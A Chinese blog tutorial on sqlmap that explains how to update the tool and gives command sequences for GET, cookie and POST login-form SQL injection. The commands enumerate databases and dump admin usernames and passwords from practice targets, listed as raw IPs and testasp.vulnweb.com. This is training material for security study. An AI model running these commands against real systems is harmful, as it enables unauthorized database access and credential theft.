sql map专题

1.sqlmap更新 

更新命令为:sqlmap -update

直接执行,如果出错。

解决方法: 找到sqlmap的路径/usr/share/salmap

执行 cd /usr/share/

然后删掉sqlmap   rm -rf sqlmap/

然后执行 git clone https://github.com/sqlmapproject/sqlmap   //克隆文件

sqlmap 参考资源 :sqlmap使用教程(超详细) - Angel-史迪仔 - 博客园
2.sqlmap使用方法

0x00 sqlmap简介

Sqlmap的7种等级:
常用–leve 3
在这里插入图片描述


0x01 mysql数据库的注入

靶场地址:http://59.63.200.79:8003
查看数据库名

sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs

在这里插入图片描述
查看表

sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe --tables

在这里插入图片描述
查看列

sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe -T admin --columns

在这里插入图片描述

查看字段

sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe -T admin -C "Id,username,password" --dump

在这里插入图片描述


0x02 COOKIE注入

靶场地址:http://117.167.136.245:10181/
查看表

sqlmap -u "http://117.167.136.245:10181/shownews.asp" --cookie "id=170" --table --level 2

在这里插入图片描述
查看列

sqlmap -u "http://117.167.136.245:10181/shownews.asp" --cookie "id=170" -T admin --columns --level 2

在这里插入图片描述
查看字段

sqlmap -u "http://117.167.136.245:10181/shownews.asp" --cookie "id=170" -T admin -C "user,content,flag,id,password,title,username" --level 2 --dump

在这里插入图片描述


0x03 POST登录框注入

靶场地址:
http://testasp.vulnweb.com/Login.asp
方法一:
1.点击login表单的submit按钮时用burp抓包
2.将拦截到的post请求存为txt, 放至sqlmap目录下
3.运行sqlmap并使用如下命令
sqlmap -r “search-test.txt” -p tfUPass
-r :让sqlmap加载我们的post请求rsearch-test.txt
-p :指定注入用的参数
查数据库

sqlmap -r "search-test.txt" -p tfUPass --dbs

查表

sqlmap -r "search-test.txt" -p tfUPass-D fendo --tables

查字段

sqlmap -r "search-test.txt" -p tfUPass-D fendo -T user --columns

方法二:
自动搜索

sqlmap -u "http://testasp.vulnweb.com/Login.asp" --forms

注意:
以下两个问题输入N其他均为Y。
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n]
对于剩余的测试,您想要包括所有针对“MySQL”扩展提供的级别(1)和风险(1)值的测试吗?[Y/n]
输入"N"
POST parameter ‘n’ is vulnerable. Do you want to keep testing the others (if any)? [y/N]
POST参数’n’是脆弱的。 你想继续测试其他人(如果有的话)吗?[y/N]
输入"N"

方法三:
指定参数搜索

sqlmap -u "http://testasp.vulnweb.com/Login.asp" --data "tfUName=321&tfUPass=321"

总结:
当post的body形式为:
param1=value1&param2=value2…使用方法一

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值